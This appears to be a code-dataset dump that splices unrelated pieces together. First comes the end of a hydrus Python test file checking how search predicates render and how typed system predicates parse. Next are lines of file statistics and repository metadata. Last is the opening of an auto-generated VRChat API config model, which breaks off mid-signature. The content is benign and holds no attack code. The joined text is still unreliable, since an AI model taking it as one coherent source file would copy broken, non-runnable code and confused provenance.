self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_LOCAL, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 100 ) )
self.assertEqual( p.ToString(), 'system:local (100)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, set( HC.IMAGES ).intersection( HC.SEARCHABLE_MIMES ) )
self.assertEqual( p.ToString(), 'system:filetype is image' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, ( HC.VIDEO_WEBM, ) )
self.assertEqual( p.ToString(), 'system:filetype is webm' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, ( HC.VIDEO_WEBM, HC.IMAGE_GIF ) )
self.assertEqual( p.ToString(), 'system:filetype is webm, gif' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NOT_LOCAL, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 100 ) )
self.assertEqual( p.ToString(), 'system:not local (100)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_TAGS, ( None, '<', 2 ) )
self.assertEqual( p.ToString(), 'system:number of tags < 2' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_TAGS, ( 'character', '<', 2 ) )
self.assertEqual( p.ToString(), 'system:number of character tags < 2' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_WORDS, ( '<', 5000 ) )
self.assertEqual( p.ToString(), 'system:number of words < 5,000' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
from hydrus.test import TestController
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_RATING, ( '>', 0.2, TestController.LOCAL_RATING_NUMERICAL_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:rating for example local rating numerical service > 1/5' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_RATIO, ( '=', 16, 9 ) )
self.assertEqual( p.ToString(), 'system:ratio = 16:9' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_SIMILAR_TO, ( ( bytes.fromhex( 'abcd' ), ), 5 ) )
self.assertEqual( p.ToString(), 'system:similar to 1 files using max hamming of 5' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_SIZE, ( '>', 5, 1048576 ) )
self.assertEqual( p.ToString(), 'system:filesize > 5MB' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_WIDTH, ( '=', 1920 ) )
self.assertEqual( p.ToString(), 'system:width = 1,920' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'series' )
self.assertEqual( p.ToString(), 'series:*anything*' )
self.assertEqual( p.GetNamespace(), 'series' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'series', False )
self.assertEqual( p.ToString(), '-series' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'a*i:o*' )
self.assertEqual( p.ToString(), 'a*i:o* (wildcard search)' )
self.assertEqual( p.GetNamespace(), 'a*i' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'a*i:o*', False )
self.assertEqual( p.ToString(), '-a*i:o*' )
self.assertEqual( p.GetNamespace(), 'a*i' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_PARENT, 'series:game of thrones' )
self.assertEqual( p.ToString(), ' series:game of thrones' )
self.assertEqual( p.GetNamespace(), 'series' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_OR_CONTAINER, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HEIGHT, ( '<', 2000 ) ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'blue eyes' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' ) ] )
self.assertEqual( p.ToString(), 'system:height < 2,000 OR blue eyes OR character:samus aran' )
self.assertEqual( p.GetNamespace(), '' )
or_texts_and_namespaces = []
or_texts_and_namespaces.append( ( 'system:height < 2,000', 'system' ) )
or_texts_and_namespaces.append( ( ' OR ', 'system' ) )
or_texts_and_namespaces.append( ( 'blue eyes', '' ) )
or_texts_and_namespaces.append( ( ' OR ', 'system' ) )
or_texts_and_namespaces.append( ( 'character:samus aran', 'character' ) )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), or_texts_and_namespaces )
def test_system_predicate_parsing( self ):
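# each human-typed system predicate string on the right should parse into a predicate that renders back as the canonical text on the left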
for ( expected_result_text, sys_pred_text ) in [
( 'system:everything', "system:everything" ),
( 'system:inbox', "system:inbox " ),
( 'system:archive', "system:archive " ),
( 'system:has duration', "system:has duration" ),
( 'system:has duration', "system:has_duration" ),
( 'system:no duration', " system:no_duration" ),
( 'system:no duration', "system:no duration" ),
( 'system:is the best quality file of its duplicate group', "system:is the best quality file of its group" ),
( 'system:is not the best quality file of its duplicate group', "system:isn't the best quality file of its duplicate group" ),
( 'system:is not the best quality file of its duplicate group', 'system:is not the best quality file of its duplicate group' ),
( 'system:has audio', "system:has_audio" ),
( 'system:no audio', "system:no audio" ),
( 'system:has tags', "system:has tags" ),
( 'system:untagged', "system:no tags" ),
( 'system:untagged', "system:untagged" ),
( 'system:number of tags > 5', "system:number of tags > 5" ),
( 'system:number of tags \u2248 10', "system:number of tags ~= 10" ),
( 'system:has tags', "system:number of tags > 0 " ),
( 'system:number of words < 2', "system:number of words < 2" ),
( 'system:height = 600', "system:height = 600px" ),
( 'system:height = 800', "system:height is 800" ),
( 'system:height > 900', "system:height > 900" ),
( 'system:width < 200', "system:width < 200" ),
( 'system:width > 1,000', "system:width > 1000 pixels" ),
( 'system:filesize \u2248 50KB', "system:filesize ~= 50 kilobytes" ),
( 'system:filesize > 10MB', "system:filesize > 10megabytes" ),
( 'system:filesize < 1GB', "system:file size < 1 GB" ),
( 'system:filesize > 0B', "system:file size > 0 B" ),
( 'system:similar to 4 files using max hamming of 3', "system:similar to abcdef01 abcdef02 abcdef03, abcdef04 with distance 3" ),
( 'system:similar to 1 files using max hamming of 5', "system:similar to abcdef distance 5" ),
( 'system:limit is 5,000', "system:limit is 5000" ),
( 'system:limit is 100', "system:limit = 100" ),
( 'system:filetype is jpeg', "system:filetype is jpeg" ),
( 'system:filetype is jpeg, png, apng', "system:filetype = image/jpg, image/png, apng" ),
( 'system:sha256 hash is in 3 hashes', "system:hash = abcdef01 abcdef02 abcdef03" ),
( 'system:md5 hash is in 3 hashes', "system:hash = abcdef01 abcdef, abcdef04 md5" ),
( 'system:md5 hash is abcdef01', "system:hash = abcdef01 md5" ),
( 'system:md5 hash is abcdef01', "system:Hash = Abcdef01 md5" ),
( 'system:md5 hash is not abcdef01', "system:Hash != Abcdef01 md5" ),
( 'system:md5 hash is not abcdef01', "system:Hash is not Abcdef01 md5" ),
( 'system:sha256 hash is abcdef0102', "system:hash = abcdef0102" ),
( 'system:modified time: since 7 years 1 month ago', "system:modified date < 7 years 45 days 70h" ),
( 'system:modified time: since 2011-06-04', "system:modified date > 2011-06-04" ),
( 'system:modified time: before 7 years 2 months ago', "system:date modified > 7 years 2 months" ),
( 'system:modified time: since 1 day ago', "system:date modified < 1 day" ),
( 'system:modified time: since 1 month 1 day ago', "system:date modified < 0 years 1 month 1 day 1 hour" ),
( 'system:last view time: since 7 years 1 month ago', "system:last viewed time < 7 years 45 days 70h" ),
( 'system:last view time: since 7 years 1 month ago', "system:last view time < 7 years 45 days 70h" ),
( 'system:import time: since 7 years 1 month ago', "system:time_imported < 7 years 45 days 70h" ),
( 'system:import time: since 2011-06-04', "system:time imported > 2011-06-04" ),
( 'system:import time: before 7 years 2 months ago', "system:time imported > 7 years 2 months" ),
( 'system:import time: since 1 day ago', "system:time imported < 1 day" ),
( 'system:import time: since 1 month 1 day ago', "system:time imported < 0 years 1 month 1 day 1 hour" ),
( 'system:import time: a month either side of 2011-01-03', " system:time imported ~= 2011-1-3 " ),
( 'system:import time: a month either side of 1996-05-02', "system:time imported ~= 1996-05-2" ),
( 'system:import time: since 7 years 1 month ago', "system:import_time < 7 years 45 days 70h" ),
( 'system:import time: since 2011-06-04', "system:import time > 2011-06-04" ),
( 'system:import time: before 7 years 2 months ago', "system:import time > 7 years 2 months" ),
( 'system:import time: since 1 day ago', "system:import time < 1 day" ),
( 'system:import time: since 1 month 1 day ago', "system:import time < 0 years 1 month 1 day 1 hour" ),
( 'system:import time: a month either side of 2011-01-03', " system:import time ~= 2011-1-3 " ),
( 'system:import time: a month either side of 1996-05-02', "system:import time ~= 1996-05-2" ),
( 'system:duration < 5.0 seconds', "system:duration < 5 seconds" ),
( 'system:duration \u2248 11.0 seconds', "system:duration ~= 5 sec 6000 msecs" ),
( 'system:duration > 3 milliseconds', "system:duration > 3 milliseconds" ),
( 'system:is pending to my files', "system:file service is pending to my files" ),
( 'system:is currently in my files', " system:file service currently in my files" ),
( 'system:is not currently in my files', "system:file service isn't currently in my files" ),
( 'system:is not pending to my files', "system:file service is not pending to my files" ),
( 'system:num file relationships - has less than 3 alternates', "system:num file relationships < 3 alternates" ),
( 'system:num file relationships - has more than 3 not related/false positive', "system:number of file relationships > 3 false positives" ),
( 'system:ratio wider than 16:9', "system:ratio is wider than 16:9 " ),
( 'system:ratio = 16:9', "system:ratio is 16:9" ),
( 'system:ratio taller than 1:1', "system:ratio taller than 1:1" ),
( 'system:number of pixels > 50 pixels', "system:num pixels > 50 px" ),
( 'system:number of pixels < 1 megapixels', "system:num pixels < 1 megapixels " ),
( 'system:number of pixels \u2248 5 kilopixels', "system:num pixels ~= 5 kilopixel" ),
( 'system:media views \u2248 10', "system:media views ~= 10" ),
( 'system:all views > 0', "system:all views > 0" ),
( 'system:preview views < 10', "system:preview views < 10 " ),
( 'system:media viewtime < 1 day 1 hour', "system:media viewtime < 1 days 1 hour 0 minutes" ),
( 'system:all viewtime > 1 hour 1 minute', "system:all viewtime > 1 hours 100 seconds" ),
( 'system:preview viewtime \u2248 2 days 7 hours', "system:preview viewtime ~= 1 day 30 hours 100 minutes 90s" ),
( 'system:has a url matching regex: index\\.php', " system:has url matching regex index\\.php" ),
( 'system:does not have a url matching regex: index\\.php', "system:does not have a url matching regex index\\.php" ),
( 'system:has url: https://safebooru.donmai.us/posts/4695284', "system:has_url https://safebooru.donmai.us/posts/4695284" ),
( 'system:does not have url: https://safebooru.donmai.us/posts/4695284', " system:doesn't have url https://safebooru.donmai.us/posts/4695284 " ),
( 'system:has a url with domain: safebooru.com', "system:has domain safebooru.com" ),
( 'system:does not have a url with domain: safebooru.com', "system:doesn't have domain safebooru.com" ),
( 'system:has safebooru file page url', "system:has a url with class safebooru file page" ),
( 'system:does not have safebooru file page url', "system:doesn't have a url with url class safebooru file page " ),
( 'system:page less than 5', "system:tag as number page < 5" )
]:
( sys_pred, ) = ClientSearchParseSystemPredicates.ParseSystemPredicateStringsToPredicates( ( sys_pred_text, ) )
self.assertEqual( sys_pred.ToString(), expected_result_text )
def test_tag_import_options_simple( self ):
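# default TagAutocompleteOptions fetch results automatically with an exact-match character threshold of 2; both settings should round-trip through their setters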
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
self.assertTrue( tag_autocomplete_options.FetchResultsAutomatically() )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), 2 )
#
tag_autocomplete_options.SetFetchResultsAutomatically( False )
self.assertFalse( tag_autocomplete_options.FetchResultsAutomatically() )
tag_autocomplete_options.SetFetchResultsAutomatically( True )
self.assertTrue( tag_autocomplete_options.FetchResultsAutomatically() )
tag_autocomplete_options.SetExactMatchCharacterThreshold( None )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), None )
tag_autocomplete_options.SetExactMatchCharacterThreshold( 2 )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), 2 )
| 65.495923
| 336
| 0.70579
| 14,275
| 136,559
| 6.396427
| 0.031734
| 0.087067
| 0.059107
| 0.06858
| 0.935143
| 0.917697
| 0.906033
| 0.880844
| 0.868129
| 0.855677
| 0
| 0.007795
| 0.202425
| 136,559
| 2,084
| 337
| 65.527351
| 0.830548
| 0.000249
| 0
| 0.628592
| 0
| 0
| 0.088927
| 0
| 0
| 0
| 0
| 0
| 0.402299
| 1
| 0.023707
| false
| 0
| 0.024425
| 0
| 0.051006
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 737ec87e3c0e0dead81276c4cb3019c85a79510f
| 53,206
| py
| Python
| vrchatapi/model/api_config.py
| vrchatapi/vrchatapi-python
| 996b7ddf2914059f1fd4e5def5e3555e678634c0
| [ "MIT" ] | 8
| 2021-08-25T02:35:30.000Z
| 2022-03-28T18:11:58.000Z
| vrchatapi/model/api_config.py
| vrchatapi/vrchatapi-python
| 996b7ddf2914059f1fd4e5def5e3555e678634c0
| [ "MIT" ] | 1
| 2022-03-18T20:29:30.000Z
| 2022-03-18T20:35:05.000Z
| vrchatapi/model/api_config.py
| vrchatapi/vrchatapi-python
| 996b7ddf2914059f1fd4e5def5e3555e678634c0
| [ "MIT" ] | 1
| 2022-01-11T10:49:12.000Z
| 2022-01-11T10:49:12.000Z
|
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.7
Contact: me@ruby.js.org
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from vrchatapi.exceptions import ApiAttributeError
def lazy_import():
from vrchatapi.model.api_event_config import APIEventConfig
from vrchatapi.model.avatar_id import AvatarID
from vrchatapi.model.deployment_group import DeploymentGroup
from vrchatapi.model.download_url_list import DownloadURLList
from vrchatapi.model.dynamic_content_row import DynamicContentRow
from vrchatapi.model.public_announcement import PublicAnnouncement
from vrchatapi.model.world_id import WorldID
globals()['APIEventConfig'] = APIEventConfig
globals()['AvatarID'] = AvatarID
globals()['DeploymentGroup'] = DeploymentGroup
globals()['DownloadURLList'] = DownloadURLList
globals()['DynamicContentRow'] = DynamicContentRow
globals()['PublicAnnouncement'] = PublicAnnouncement
globals()['WorldID'] = WorldID
class APIConfig(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute;
for a top-level attribute var_name this is (var_name,). The value is a dict
mapping a capitalized key describing the allowed value to the allowed
value itself. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute;
for a top-level attribute var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('address',): {
'min_length': 1,
},
('announcements',): {
'min_items': 1,
},
('api_key',): {
'min_length': 1,
},
('app_name',): {
'min_length': 1,
},
('build_version_tag',): {
'min_length': 1,
},
('client_api_key',): {
'min_length': 1,
},
('contact_email',): {
'min_length': 1,
},
('copyright_email',): {
'min_length': 1,
},
('current_tos_version',): {
'inclusive_minimum': 0,
},
('dev_app_version_standalone',): {
'min_length': 1,
},
('dev_download_link_windows',): {
'min_length': 1,
},
('dev_sdk_url',): {
'min_length': 1,
},
('dev_sdk_version',): {
'min_length': 1,
},
('dev_server_version_standalone',): {
'min_length': 1,
},
('download_link_windows',): {
'min_length': 1,
},
('dynamic_world_rows',): {
'min_items': 1,
},
('gear_demo_room_id',): {
'min_length': 1,
},
('homepage_redirect_target',): {
'min_length': 1,
},
('jobs_email',): {
'min_length': 1,
},
('message_of_the_day',): {
'min_length': 1,
},
('moderation_email',): {
'min_length': 1,
},
('not_allowed_to_select_avatar_in_private_world_message',): {
'min_length': 1,
},
('plugin',): {
'min_length': 1,
},
('release_app_version_standalone',): {
'min_length': 1,
},
('release_sdk_url',): {
'min_length': 1,
},
('release_sdk_version',): {
'min_length': 1,
},
('release_server_version_standalone',): {
'min_length': 1,
},
('sdk_developer_faq_url',): {
'min_length': 1,
},
('sdk_discord_url',): {
'min_length': 1,
},
('sdk_not_allowed_to_publish_message',): {
'min_length': 1,
},
('sdk_unity_version',): {
'min_length': 1,
},
('server_name',): {
'min_length': 1,
},
('support_email',): {
'min_length': 1,
},
('vive_windows_url',): {
'min_length': 1,
},
('youtubedl_hash',): {
'min_length': 1,
},
('youtubedl_version',): {
'min_length': 1,
},
}
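# Editor's note (sketch of the generated pattern, not part of the original file):
# each entry above describes per-attribute constraints (min_length, min_items, ...)
# that the shared model_utils helpers are expected to enforce when values are set,
# e.g. a 'min_length': 1 rule rejects an empty string for that attribute.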
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'voice_enable_degradation': (bool,), # noqa: E501
'voice_enable_receiver_limiting': (bool,), # noqa: E501
'address': (str,), # noqa: E501
'announcements': ([PublicAnnouncement],), # noqa: E501
'api_key': (str,), # noqa: E501
'app_name': (str,), # noqa: E501
'build_version_tag': (str,), # noqa: E501
'client_api_key': (str,), # noqa: E501
'client_bps_ceiling': (int,), # noqa: E501
'client_disconnect_timeout': (int,), # noqa: E501
'client_reserved_player_bps': (int,), # noqa: E501
'client_sent_count_allowance': (int,), # noqa: E501
'contact_email': (str,), # noqa: E501
'copyright_email': (str,), # noqa: E501
'current_tos_version': (int,), # noqa: E501
'default_avatar': (AvatarID,), # noqa: E501
'deployment_group': (DeploymentGroup,), # noqa: E501
'dev_app_version_standalone': (str,), # noqa: E501
'dev_download_link_windows': (str,), # noqa: E501
'dev_sdk_url': (str,), # noqa: E501
'dev_sdk_version': (str,), # noqa: E501
'dev_server_version_standalone': (str,), # noqa: E501
'dis_countdown': (datetime,), # noqa: E501
'disable_avatar_copying': (bool,), # noqa: E501
'disable_avatar_gating': (bool,), # noqa: E501
'disable_community_labs': (bool,), # noqa: E501
'disable_community_labs_promotion': (bool,), # noqa: E501
'disable_email': (bool,), # noqa: E501
'disable_event_stream': (bool,), # noqa: E501
'disable_feedback_gating': (bool,), # noqa: E501
'disable_frontend_builds': (bool,), # noqa: E501
'disable_hello': (bool,), # noqa: E501
'disable_oculus_subs': (bool,), # noqa: E501
'disable_registration': (bool,), # noqa: E501
'disable_steam_networking': (bool,), # noqa: E501
'disable_two_factor_auth': (bool,), # noqa: E501
'disable_udon': (bool,), # noqa: E501
'disable_upgrade_account': (bool,), # noqa: E501
'download_link_windows': (str,), # noqa: E501
'download_urls': (DownloadURLList,), # noqa: E501
'dynamic_world_rows': ([DynamicContentRow],), # noqa: E501
'events': (APIEventConfig,), # noqa: E501
'gear_demo_room_id': (str,), # noqa: E501
'home_world_id': (WorldID,), # noqa: E501
'homepage_redirect_target': (str,), # noqa: E501
'hub_world_id': (WorldID,), # noqa: E501
'jobs_email': (str,), # noqa: E501
'message_of_the_day': (str,), # noqa: E501
'moderation_email': (str,), # noqa: E501
'moderation_query_period': (int,), # noqa: E501
'not_allowed_to_select_avatar_in_private_world_message': (str,), # noqa: E501
'plugin': (str,), # noqa: E501
'release_app_version_standalone': (str,), # noqa: E501
'release_sdk_url': (str,), # noqa: E501
'release_sdk_version': (str,), # noqa: E501
'release_server_version_standalone': (str,), # noqa: E501
'sdk_developer_faq_url': (str,), # noqa: E501
'sdk_discord_url': (str,), # noqa: E501
'sdk_not_allowed_to_publish_message': (str,), # noqa: E501
'sdk_unity_version': (str,), # noqa: E501
'server_name': (str,), # noqa: E501
'support_email': (str,), # noqa: E501
'time_out_world_id': (WorldID,), # noqa: E501
'tutorial_world_id': (WorldID,), # noqa: E501
'update_rate_ms_maximum': (int,), # noqa: E501
'update_rate_ms_minimum': (int,), # noqa: E501
'update_rate_ms_normal': (int,), # noqa: E501
'update_rate_ms_udon_manual': (int,), # noqa: E501
'upload_analysis_percent': (int,), # noqa: E501
'url_list': ([str],), # noqa: E501
'use_reliable_udp_for_voice': (bool,), # noqa: E501
'user_update_period': (int,), # noqa: E501
'user_verification_delay': (int,), # noqa: E501
'user_verification_retry': (int,), # noqa: E501
'user_verification_timeout': (int,), # noqa: E501
'vive_windows_url': (str,), # noqa: E501
'white_listed_asset_urls': ([str],), # noqa: E501
'world_update_period': (int,), # noqa: E501
'youtubedl_hash': (str,), # noqa: E501
'youtubedl_version': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'voice_enable_degradation': 'VoiceEnableDegradation', # noqa: E501
'voice_enable_receiver_limiting': 'VoiceEnableReceiverLimiting', # noqa: E501
'address': 'address', # noqa: E501
'announcements': 'announcements', # noqa: E501
'api_key': 'apiKey', # noqa: E501
'app_name': 'appName', # noqa: E501
'build_version_tag': 'buildVersionTag', # noqa: E501
'client_api_key': 'clientApiKey', # noqa: E501
'client_bps_ceiling': 'clientBPSCeiling', # noqa: E501
'client_disconnect_timeout': 'clientDisconnectTimeout', # noqa: E501
'client_reserved_player_bps': 'clientReservedPlayerBPS', # noqa: E501
'client_sent_count_allowance': 'clientSentCountAllowance', # noqa: E501
'contact_email': 'contactEmail', # noqa: E501
'copyright_email': 'copyrightEmail', # noqa: E501
'current_tos_version': 'currentTOSVersion', # noqa: E501
'default_avatar': 'defaultAvatar', # noqa: E501
'deployment_group': 'deploymentGroup', # noqa: E501
'dev_app_version_standalone': 'devAppVersionStandalone', # noqa: E501
'dev_download_link_windows': 'devDownloadLinkWindows', # noqa: E501
'dev_sdk_url': 'devSdkUrl', # noqa: E501
'dev_sdk_version': 'devSdkVersion', # noqa: E501
'dev_server_version_standalone': 'devServerVersionStandalone', # noqa: E501
'dis_countdown': 'dis-countdown', # noqa: E501
'disable_avatar_copying': 'disableAvatarCopying', # noqa: E501
'disable_avatar_gating': 'disableAvatarGating', # noqa: E501
'disable_community_labs': 'disableCommunityLabs', # noqa: E501
'disable_community_labs_promotion': 'disableCommunityLabsPromotion', # noqa: E501
'disable_email': 'disableEmail', # noqa: E501
'disable_event_stream': 'disableEventStream', # noqa: E501
'disable_feedback_gating': 'disableFeedbackGating', # noqa: E501
'disable_frontend_builds': 'disableFrontendBuilds', # noqa: E501
'disable_hello': 'disableHello', # noqa: E501
'disable_oculus_subs': 'disableOculusSubs', # noqa: E501
'disable_registration': 'disableRegistration', # noqa: E501
'disable_steam_networking': 'disableSteamNetworking', # noqa: E501
'disable_two_factor_auth': 'disableTwoFactorAuth', # noqa: E501
'disable_udon': 'disableUdon', # noqa: E501
'disable_upgrade_account': 'disableUpgradeAccount', # noqa: E501
'download_link_windows': 'downloadLinkWindows', # noqa: E501
'download_urls': 'downloadUrls', # noqa: E501
'dynamic_world_rows': 'dynamicWorldRows', # noqa: E501
'events': 'events', # noqa: E501
'gear_demo_room_id': 'gearDemoRoomId', # noqa: E501
'home_world_id': 'homeWorldId', # noqa: E501
'homepage_redirect_target': 'homepageRedirectTarget', # noqa: E501
'hub_world_id': 'hubWorldId', # noqa: E501
'jobs_email': 'jobsEmail', # noqa: E501
'message_of_the_day': 'messageOfTheDay', # noqa: E501
'moderation_email': 'moderationEmail', # noqa: E501
'moderation_query_period': 'moderationQueryPeriod', # noqa: E501
'not_allowed_to_select_avatar_in_private_world_message': 'notAllowedToSelectAvatarInPrivateWorldMessage', # noqa: E501
'plugin': 'plugin', # noqa: E501
'release_app_version_standalone': 'releaseAppVersionStandalone', # noqa: E501
'release_sdk_url': 'releaseSdkUrl', # noqa: E501
'release_sdk_version': 'releaseSdkVersion', # noqa: E501
'release_server_version_standalone': 'releaseServerVersionStandalone', # noqa: E501
'sdk_developer_faq_url': 'sdkDeveloperFaqUrl', # noqa: E501
'sdk_discord_url': 'sdkDiscordUrl', # noqa: E501
'sdk_not_allowed_to_publish_message': 'sdkNotAllowedToPublishMessage', # noqa: E501
'sdk_unity_version': 'sdkUnityVersion', # noqa: E501
'server_name': 'serverName', # noqa: E501
'support_email': 'supportEmail', # noqa: E501
'time_out_world_id': 'timeOutWorldId', # noqa: E501
'tutorial_world_id': 'tutorialWorldId', # noqa: E501
'update_rate_ms_maximum': 'updateRateMsMaximum', # noqa: E501
'update_rate_ms_minimum': 'updateRateMsMinimum', # noqa: E501
'update_rate_ms_normal': 'updateRateMsNormal', # noqa: E501
'update_rate_ms_udon_manual': 'updateRateMsUdonManual', # noqa: E501
'upload_analysis_percent': 'uploadAnalysisPercent', # noqa: E501
'url_list': 'urlList', # noqa: E501
'use_reliable_udp_for_voice': 'useReliableUdpForVoice', # noqa: E501
'user_update_period': 'userUpdatePeriod', # noqa: E501
'user_verification_delay': 'userVerificationDelay', # noqa: E501
'user_verification_retry': 'userVerificationRetry', # noqa: E501
'user_verification_timeout': 'userVerificationTimeout', # noqa: E501
'vive_windows_url': 'viveWindowsUrl', # noqa: E501
'white_listed_asset_urls': 'whiteListedAssetUrls', # noqa: E501
'world_update_period': 'worldUpdatePeriod', # noqa: E501
'youtubedl_hash': 'youtubedl-hash', # noqa: E501
'youtubedl_version': 'youtubedl-version', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, address, announcements, api_key, build_version_tag, client_api_key, contact_email, copyright_email, current_tos_version, default_avatar, deployment_group, dev_app_version_standalone, dev_download_link_windows, dev_sdk_url, dev_sdk_version, dev_server_version_standalone, dis_countdown, download_link_windows, download_urls, dynamic_world_rows, events, gear_demo_room_id, home_world_id, hub_world_id, jobs_email, message_of_the_day, moderation_email, moderation_query_period, not_allowed_to_select_avatar_in_private_world_message, plugin, release_app_version_standalone, release_sdk_url, release_sdk_version, release_server_version_standalone, sdk_developer_faq_url, sdk_discord_url, sdk_not_allowed_to_publish_message, sdk_unity_version, server_name, support_email, time_out_world_id, tutorial_world_id, update_rate_ms_maximum, update_rate_ms_minimum, update_rate_ms_normal, update_rate_ms_udon_manual, upload_analysis_percent, url_list, user_update_period, user_verification_delay, user_verification_retry, user_verification_timeout, vive_windows_url, 